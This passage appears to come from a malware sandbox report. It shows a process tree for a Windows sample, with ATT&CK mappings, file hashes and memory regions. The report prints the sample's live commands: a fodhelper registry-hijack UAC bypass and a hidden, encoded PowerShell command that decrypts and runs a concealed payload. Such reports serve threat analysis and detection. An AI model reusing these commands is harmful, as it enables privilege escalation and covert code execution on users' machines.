AEEATgBRAEIAaABBAEcATQBBAFoAUQBBADAAQQBHAEkAQQBNAHcAQQB6AEEARABrAEEATQB3AEEAeABBAEQAVQBBAFoAQQBBADUAQQBHAFkAQQBOAFEAQgBpAEEARABjAEEATQBnAEIAawBBAEQAWQBBAE0AdwBBADEAQQBHAFUAQQBZAGcAQQB5AEEARABrAEEATQBBAEIAagBBAEcARQBBAE0AdwBCAGoAQQBHAEUAQQBNAHcAQQAzAEEARABrAEEATgBBAEEAegBBAEcATQBBAFoAUQBBAHgAQQBEAFUAQQBOAHcAQgBtAEEARABFAEEATQBnAEEAdwBBAEcAUQBBAFkAdwBCAGkAQQBEAFUAQQBPAFEAQQB5AEEARABjAEEATQBBAEEAMABBAEQAawBBAE4AUQBBAHgAQQBHAE0AQQBZAHcAQQB4AEEARwBVAEEAWQBRAEIAawBBAEQASQBBAE4AUQBBADUAQQBEAGsAQQBaAEEAQgBoAEEARABFAEEATQBnAEEAMQBBAEcATQBBAE4AdwBCAGoAQQBEAGsAQQBOAEEAQQAwAEEARwBZAEEAWgBnAEIAawBBAEQAQQBBAFkAZwBCAGoAQQBEAFUAQQBOAHcAQgBtAEEARABJAEEATQBnAEIAagBBAEQAQQBBAE8AQQBBADUAQQBEAFEAQQBPAEEAQQAwAEEARwBRAEEATQBRAEEANQBBAEQAUQBBAFkAdwBBADIAQQBEAEEAQQBaAEEAQQB4AEEARwBVAEEATQBnAEIAaABBAEQAYwBBAE0AZwBBADIAQQBEAEUAQQBOAGcAQgBrAEEARwBRAEEATQBnAEEANQBBAEQASQBBAE8AUQBCAGwAQQBHAFUAQQBZAFEAQgBsAEEARwBJAEEAWgBnAEEAMwBBAEQAUQBBAFoAQQBBADUAQQBEAEUAQQBNAGcAQQB4AEEARwBFAEEAWgBBAEIAbQBBAEQAWQBBAFkAUQBBADMAQQBEAEkAQQBPAFEAQQA0AEEARABnAEEAWgBnAEEAMQBBAEcAUQBBAE4AUQBBAHcAQQBEAFUAQQBZAFEAQgBqAEEARABVAEEATQBRAEEANABBAEcARQBBAFkAUQBBADEAQQBEAGMAQQBZAGcAQQAyAEEARABBAEEATgBBAEIAbQBBAEQAYwBBAE4AUQBBADUAQQBEAGMAQQBNAGcAQgBpAEEARwBRAEEAWgBBAEIAbQBBAEQAVQBBAE0AdwBBADQAQQBEAEUAQQBOAFEAQQB6AEEARwBVAEEATQBnAEEAMQBBAEQAQQBBAE4AQQBBADMAQQBHAEkAQQBNAHcAQQB4AEEARABFAEEAWQBRAEEAdwBBAEcAVQBBAE4AZwBBADEAQQBEAGMAQQBNAHcAQgBsAEEARwBRAEEATgB3AEEAdwBBAEcASQBBAE4AZwBBADMAQQBEAEUAQQBNAEEAQQA0AEEARABZAEEAWgBRAEEAegBBAEQATQBBAFkAdwBBADUAQQBEAGMAQQBZAHcAQgBqAEEARABjAEEATgB3AEEAMQBBAEQAWQBBAFoAZwBBAHgAQQBEAGcAQQBaAEEAQgBsAEEARABVAEEATgBRAEEAdwBBAEQAawBBAFkAZwBBADMAQQBEAGcAQQBOAHcAQgBoAEEARABjAEEATQBRAEEAeABBAEQARQBBAE0AUQBBAHkAQQBEAGsAQQBOAEEAQgBtAEEARABJAEEATgB3AEEANQBBAEQASQBBAE8AQQBBAHgAQQBEAE0AQQBZAFEAQQAxAEEARABjAEEATgBnAEIAawBBAEcASQBBAE0AZwBBADIAQQBHAFUAQQBNAHcAQQB4AEEARwBZAEEAWQBRAEEANABBAEEAPQA9ACcAIAB8AGMAbwBOAFYARQByAFQAVABvAC0AUwBFAEMAVQBSAGUAcwB0AFIAaQBOAEcAIAAtAEsAIAAzACwAMQA4ADMALAAzADAALAAyADQAMgAsADQANgAsADUANAAsADEAMQAwACwANgAsADEANgA5ACwANwAxACwAOAA4ACwAMQA4ADIALAA5ADUALAAxADkAMwAsADEAMAA4ACwAMgAxADcALAA3ADUALAAyADIAMwAsADIANQAzACwANgAyACwAMgAxADUALAA4ADkALAAyADUAMwAsADIAMgA5ACkAIAApAC4ARwBFAFQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgBUAGkAYQBsACgAKQAuAFAAYQBTAHMAdwBPAFIAZAApACAA " /f
3⤵
- Modifies registry class
- Modifies registry key
PID:4040

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
3⤵
- Modifies registry class
- Modifies registry key
PID:5028

C:\Windows\system32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"PowerShell.exe" -w h -NoP -NonI -Exec Bypass -enc IABJAG4AdgBvAGsAZQAtAEUAeABQAFIARQBTAFMASQBvAG4AIAAoACgAIABuAEUAdwAtAE8AYgBKAGUAYwBUACAAIABtAGEAbgBhAEcARQBNAGUATgBUAC4AQQBVAFQATwBtAEEAdABJAG8AbgAuAFAAcwBDAHIAZQBkAEUAbgBUAGkAQQBMACAAJwAgACcALAAoACcANwA2ADQAOQAyAGQAMQAxADEANgA3ADQAMwBmADAANAAyADMANAAxADMAYgAxADYAMAA1ADAAYQA1ADMANAA1AE0AZwBCADgAQQBIAGsAQQBSAGcAQgBxAEEARgBnAEEAWQBRAEIAeQBBAEQAawBBAE8AQQBCADAAQQBIAGsAQQBhAEEAQQA0AEEARwBnAEEAZABnAEIAVgBBAEYAbwBBAFYAQQBCADUAQQBFAFEAQQBOAEEAQgBvAEEARwBjAEEAUABRAEEAOQBBAEgAdwBBAE8AQQBCAG0AQQBEAEkAQQBaAFEAQgBsAEEARABRAEEAWQB3AEIAawBBAEQAZwBBAE0AdwBCAGkAQQBHAEUAQQBZAGcAQgBrAEEARwBZAEEAWQB3AEIAagBBAEcAUQBBAE4AdwBCAGsAQQBEAGsAQQBOAHcAQgBqAEEARABrAEEAWgBnAEIAaQBBAEQAVQBBAE4AZwBBADUAQQBEAEUAQQBaAEEAQgBsAEEARABJAEEATQBnAEEAdwBBAEQAZwBBAE4AQQBBADUAQQBEAFEAQQBaAGcAQQA1AEEARwBFAEEATQB3AEIAbQBBAEcASQBBAE0AQQBBADEAQQBEAGsAQQBZAFEAQgBoAEEARABVAEEATwBBAEEAegBBAEcAWQBBAE4AZwBBAHoAQQBEAFEAQQBaAFEAQQB3AEEARABrAEEAWQBnAEEAegBBAEcARQBBAFoAZwBBADMAQQBHAEUAQQBOAEEAQgBqAEEARABjAEEATgBRAEEAdwBBAEQAVQBBAE4AQQBBADEAQQBEAFkAQQBZAHcAQgBpAEEARwBZAEEATwBBAEIAbQBBAEQAZwBBAE0AUQBCAGgAQQBEAEUAQQBNAHcAQQA0AEEARwBZAEEATwBRAEIAagBBAEcAUQBBAE4AdwBCAGoAQQBHAEUAQQBZAGcAQQA0AEEARABJAEEAWgBRAEEAMwBBAEcATQBBAE4AZwBBADUAQQBEAGcAQQBPAEEAQgBqAEEARABZAEEATQBBAEIAaQBBAEQASQBBAFkAZwBBAHoAQQBEAFUAQQBaAEEAQgBqAEEARwBRAEEATQBRAEEAMABBAEcASQBBAE0AZwBBAHcAQQBEAGsAQQBZAHcAQQAwAEEARwBFAEEATgB3AEIAbABBAEQATQBBAFoAUQBBADUAQQBHAEkAQQBZAHcAQQAyAEEARwBRAEEATgBRAEEAeABBAEQAawBBAE0AZwBBADQAQQBHAFEAQQBaAGcAQgBtAEEARABFAEEATQB3AEEAMgBBAEQAawBBAFkAZwBBADIAQQBHAFEAQQBOAHcAQQAxAEEARABNAEEATQBnAEEANABBAEQAUQBBAE4AZwBBAHcAQQBHAFUAQQBZAFEAQQAyAEEARABFAEEATQBBAEEANABBAEcARQBBAE0AZwBCAG0AQQBHAE0AQQBNAEEAQQAyAEEARABZAEEAWQBRAEEAMwBBAEQAawBBAE0AQQBBAHkAQQBHAE0AQQBNAHcAQgBpAEEARwBFAEEAWQB3AEIAbABBAEQARQBBAE4AZwBBAHgAQQBHAFUAQQBZAFEAQQA1AEEARABZAEEATQBnAEEAeABBAEQAawBBAE4AUQBBADUAQQBEAEEAQQBNAGcAQQAwAEEARwBFAEEATgBnAEEAeABBAEQAWQBBAE0AdwBBAHkAQQBEAFkAQQBOAFEAQQAzAEEARABNAEEATwBBAEIAbQBBAEQAawBBAFkAdwBCAGgAQQBHAFUAQQBOAGcAQQAzAEEARABBAEEATwBBAEEANABBAEcARQBBAE0AQQBCAGkAQQBEAEUAQQBNAEEAQgBpAEEARwBFAEEATQBRAEIAawBBAEcATQBBAFkAUQBCAG0AQQBEAEEAQQBNAEEAQQB3AEEARABJAEEATQBBAEEAMwBBAEQAVQBBAFkAZwBBADQAQQBHAFUAQQBNAFEAQgBrAEEARABNAEEAWQBRAEEANQBBAEQAWQBBAE0AUQBCAGoAQQBHAFEAQQBZAFEAQQA1AEEARwBZAEEATQBnAEEAdwBBAEcATQBBAE0AQQBCAGsAQQBHAEkAQQBOAGcAQQB6AEEARABBAEEATQB3AEEANABBAEQAQQBBAFkAZwBBADUAQQBEAEUAQQBOAFEAQgBrAEEARABFAEEAWQBRAEEAMgBBAEcARQBBAE4AQQBBADIAQQBEAGMAQQBOAGcAQQB4AEEARABrAEEATgB3AEIAaABBAEcAUQBBAE0AQQBBADMAQQBHAFEAQQBNAGcAQQB6AEEARwBNAEEATQBnAEEANQBBAEcAWQBBAE0AdwBCAGwAQQBEAEUAQQBPAEEAQQB4AEEARABnAEEATQBRAEIAawBBAEQAawBBAE0AUQBCAG0AQQBEAFkAQQBNAGcAQQAyAEEARABnAEEAWgBRAEEANQBBAEQARQBBAE0AQQBBAHcAQQBEAEUAQQBPAEEAQQAwAEEARABBAEEATQBBAEEANABBAEQATQBBAE0AQQBBAHgAQQBHAFUAQQBNAFEAQQB4AEEARwBNAEEATwBBAEIAaABBAEQASQBBAE0AUQBCAGsAQQBEAEUAQQBOAHcAQgBtAEEARwBRAEEATgBBAEEAMgBBAEQAYwBBAE8AUQBBAHkAQQBEAFEAQQBaAGcAQQB6AEEARwBNAEEAWQBRAEIAagBBAEQAWQBBAFkAdwBBADQAQQBEAEEAQQBNAEEAQQAyAEEARwBNAEEATQBRAEIAaABBAEcARQBBAE8AQQBCAGoAQQBHAFkAQQBNAGcAQgBqAEEARwBFAEEATQBnAEIAagBBAEcARQBBAE0AdwBBAHoAQQBEAFkAQQBOAFEAQgBqAEEARABjAEEAWgBBAEIAaABBAEQAWQBBAFkAUQBCAGoAQQBHAFEAQQBOAFEAQQB6AEEARABnAEEATQBnAEIAawBBAEQASQBBAE8AUQBBADMAQQBEAFkAQQBOAFEAQQAxAEEARABZAEEATgBBAEEAMgBBAEcAVQBBAE0AdwBCAG0AQQBEAFUAQQBZAGcAQgBpAEEARwBVAEEATgBBAEIAaABBAEQASQBBAE0AZwBBADEAQQBEAGsAQQBOAEEAQQB3AEEARwBRAEEAWgBnAEIAagBBAEQARQBBAFoAQQBBADAAQQBHAEkAQQBOAHcAQgBsAEEARABjAEEATQBnAEIAbABBAEQAUQBBAE0AZwBCAGoAQQBEAEEAQQBPAEEAQQAyAEEARABFAEEATgBnAEEANQBBAEcAWQBBAFkAZwBBADIAQQBEAEUAQQBOAEEAQQB3AEEARABVAEEATgBRAEEAMgBBAEQARQBBAFkAUQBCAGsAQQBHAFUAQQBaAGcAQgBsAEEARwBJAEEATgBRAEIAaABBAEQASQBBAE0AZwBCAGkAQQBHAFEAQQBZAHcAQQAyAEEARwBJAEEAWQBnAEEAegBBAEQAawBBAE0AZwBBADUAQQBHAFUAQQBaAEEAQQB4AEEARABrAEEATQB3AEEAeABBAEQAQQBBAFoAZwBBAHkAQQBHAFEAQQBNAFEAQQAwAEEARwBFAEEATwBBAEIAbQBBAEcARQBBAFoAQQBBADQAQQBEAEUAQQBaAFEAQQB5AEEARABJAEEATgBRAEIAaABBAEQAWQBBAE0AdwBBADMAQQBEAGMAQQBPAFEAQQA1AEEARwBVAEEATwBRAEEAMwBBAEcASQBBAFoAZwBCAGkAQQBEAFkAQQBNAHcAQQA0AEEARABNAEEATgBnAEEAdwBBAEQAUQBBAFkAdwBBAHcAQQBHAEUAQQBNAFEAQQB4AEEARABBAEEATQB3AEEAeQBBAEQAUQBBAE0AdwBCAGkAQQBHAE0AQQBOAHcAQgBtAEEARwBFAEEATwBBAEIAaQBBAEQAUQBBAFoAUQBCAGwAQQBHAEUAQQBOAEEAQQAwAEEARABBAEEAWQB3AEIAawBBAEcAUQBBAE4AQQBBAHoAQQBHAEkAQQBNAGcAQQB5AEEARwBNAEEATwBRAEEAeABBAEQASQBBAE8AUQBBADEAQQBEAFEAQQBOAEEAQgBrAEEARwBRAEEATgBRAEIAaABBAEcATQBBAFoAUQBBADAAQQBHAEkAQQBNAHcAQQB6AEEARABrAEEATQB3AEEAeABBAEQAVQBBAFoAQQBBADUAQQBHAFkAQQBOAFEAQgBpAEEARABjAEEATQBnAEIAawBBAEQAWQBBAE0AdwBBADEAQQBHAFUAQQBZAGcAQQB5AEEARABrAEEATQBBAEIAagBBAEcARQBBAE0AdwBCAGoAQQBHAEUAQQBNAHcAQQAzAEEARABrAEEATgBBAEEAegBBAEcATQBBAFoAUQBBAHgAQQBEAFUAQQBOAHcAQgBtAEEARABFAEEATQBnAEEAdwBBAEcAUQBBAFkAdwBCAGkAQQBEAFUAQQBPAFEAQQB5AEEARABjAEEATQBBAEEAMABBAEQAawBBAE4AUQBBAHgAQQBHAE0AQQBZAHcAQQB4AEEARwBVAEEAWQBRAEIAawBBAEQASQBBAE4AUQBBADUAQQBEAGsAQQBaAEEAQgBoAEEARABFAEEATQBnAEEAMQBBAEcATQBBAE4AdwBCAGoAQQBEAGsAQQBOAEEAQQAwAEEARwBZAEEAWgBnAEIAawBBAEQAQQBBAFkAZwBCAGoAQQBEAFUAQQBOAHcAQgBtAEEARABJAEEATQBnAEIAagBBAEQAQQBBAE8AQQBBADUAQQBEAFEAQQBPAEEAQQAwAEEARwBRAEEATQBRAEEANQBBAEQAUQBBAFkAdwBBADIAQQBEAEEAQQBaAEEAQQB4AEEARwBVAEEATQBnAEIAaABBAEQAYwBBAE0AZwBBADIAQQBEAEUAQQBOAGcAQgBrAEEARwBRAEEATQBnAEEANQBBAEQASQBBAE8AUQBCAGwAQQBHAFUAQQBZAFEAQgBsAEEARwBJAEEAWgBnAEEAMwBBAEQAUQBBAFoAQQBBADUAQQBEAEUAQQBNAGcAQQB4AEEARwBFAEEAWgBBAEIAbQBBAEQAWQBBAFkAUQBBADMAQQBEAEkAQQBPAFEAQQA0AEEARABnAEEAWgBnAEEAMQBBAEcAUQBBAE4AUQBBAHcAQQBEAFUAQQBZAFEAQgBqAEEARABVAEEATQBRAEEANABBAEcARQBBAFkAUQBBADEAQQBEAGMAQQBZAGcAQQAyAEEARABBAEEATgBBAEIAbQBBAEQAYwBBAE4AUQBBADUAQQBEAGMAQQBNAGcAQgBpAEEARwBRAEEAWgBBAEIAbQBBAEQAVQBBAE0AdwBBADQAQQBEAEUAQQBOAFEAQQB6AEEARwBVAEEATQBnAEEAMQBBAEQAQQBBAE4AQQBBADMAQQBHAEkAQQBNAHcAQQB4AEEARABFAEEAWQBRAEEAdwBBAEcAVQBBAE4AZwBBADEAQQBEAGMAQQBNAHcAQgBsAEEARwBRAEEATgB3AEEAdwBBAEcASQBBAE4AZwBBADMAQQBEAEUAQQBNAEEAQQA0AEEARABZAEEAWgBRAEEAegBBAEQATQBBAFkAdwBBADUAQQBEAGMAQQBZAHcAQgBqAEEARABjAEEATgB3AEEAMQBBAEQAWQBBAFoAZwBBAHgAQQBEAGcAQQBaAEEAQgBsAEEARABVAEEATgBRAEEAdwBBAEQAawBBAFkAZwBBADMAQQBEAGcAQQBOAHcAQgBoAEEARABjAEEATQBRAEEAeABBAEQARQBBAE0AUQBBAHkAQQBEAGsAQQBOAEEAQgBtAEEARABJAEEATgB3AEEANQBBAEQASQBBAE8AQQBBAHgAQQBEAE0AQQBZAFEAQQAxAEEARABjAEEATgBnAEIAawBBAEcASQBBAE0AZwBBADIAQQBHAFUAQQBNAHcAQQB4AEEARwBZAEEAWQBRAEEANABBAEEAPQA9ACcAIAB8AGMAbwBOAFYARQByAFQAVABvAC0AUwBFAEMAVQBSAGUAcwB0AFIAaQBOAEcAIAAtAEsAIAAzACwAMQA4ADMALAAzADAALAAyADQAMgAsADQANgAsADUANAAsADEAMQAwACwANgAsADEANgA5ACwANwAxACwAOAA4ACwAMQA4ADIALAA5ADUALAAxADkAMwAsADEAMAA4ACwAMgAxADcALAA3ADUALAAyADIAMwAsADIANQAzACwANgAyACwAMgAxADUALAA4ADkALAAyADUAMwAsADIAMgA5ACkAIAApAC4ARwBFAFQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgBUAGkAYQBsACgAKQAuAFAAYQBTAHMAdwBPAFIAZAApACAA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f
3⤵
- Modifies registry class
- Modifies registry key
PID:400

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
3⤵
- Modifies registry class
- Modifies registry key
PID:3636

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2663c512c4eda80a91f245f45c7950c4

SHA1
4735b7a2017957f146c96ec0a2c51bbdb6cd1492

SHA256
935a629f082f7e37778e387d4d19618ba44b970c7da42a68f23c493462b2386f

SHA512
fcd6e7f11070381d14e1eb6fb1bde6ecb6d797fb82834ca47a39c23fa06a5cb3f068964b8babb7b37fa5e6a5bde2e86fe04626413adf9065e660de6709f16d5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\398E.tmp\398F.tmp\3990.ps1
Filesize
13KB

MD5
a00d5ba95c525328c1de6dfdb91e7e6e

SHA1
cf5a296c0babe02b2a3e7b674b07be5e2457a44e

SHA256
e6257b6b2e9b91c41d69b36b2dfa595b338ad911acd659c3cd9b0b0f8081d302

SHA512
2910e74c07b96c1fd1ba17dec43811288e85ccefe3384560b466d5df7ec5a01eec4e971796acb4df102a06d6c63f03620043bc4abca49dc14cd5410c920fb44f

Download Submit
memory/400-142-0x0000000000000000-mapping.dmp

Download
memory/3116-132-0x0000000140000000-0x0000000140027000-memory.dmp

Filesize
156KB

Download
memory/3116-144-0x0000000140000000-0x0000000140027000-memory.dmp

Filesize
156KB

Download
memory/3128-140-0x0000000000000000-mapping.dmp

Download
memory/3128-141-0x00007FFC13A30000-0x00007FFC144F1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-146-0x00007FFC13A30000-0x00007FFC144F1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-149-0x00007FFC13A30000-0x00007FFC144F1000-memory.dmp

Filesize
10.8MB

Download
memory/3636-143-0x0000000000000000-mapping.dmp

Download
memory/3724-137-0x00007FFC13A30000-0x00007FFC144F1000-memory.dmp

Filesize
10.8MB

Download
memory/3724-145-0x00007FFC13A30000-0x00007FFC144F1000-memory.dmp

Filesize
10.8MB

Download
memory/3724-134-0x00000161E6350000-0x00000161E6372000-memory.dmp

Filesize
136KB

Download
memory/3724-133-0x0000000000000000-mapping.dmp

Download
memory/4040-136-0x0000000000000000-mapping.dmp

Download
memory/4372-139-0x0000000000000000-mapping.dmp

Download
memory/5028-138-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads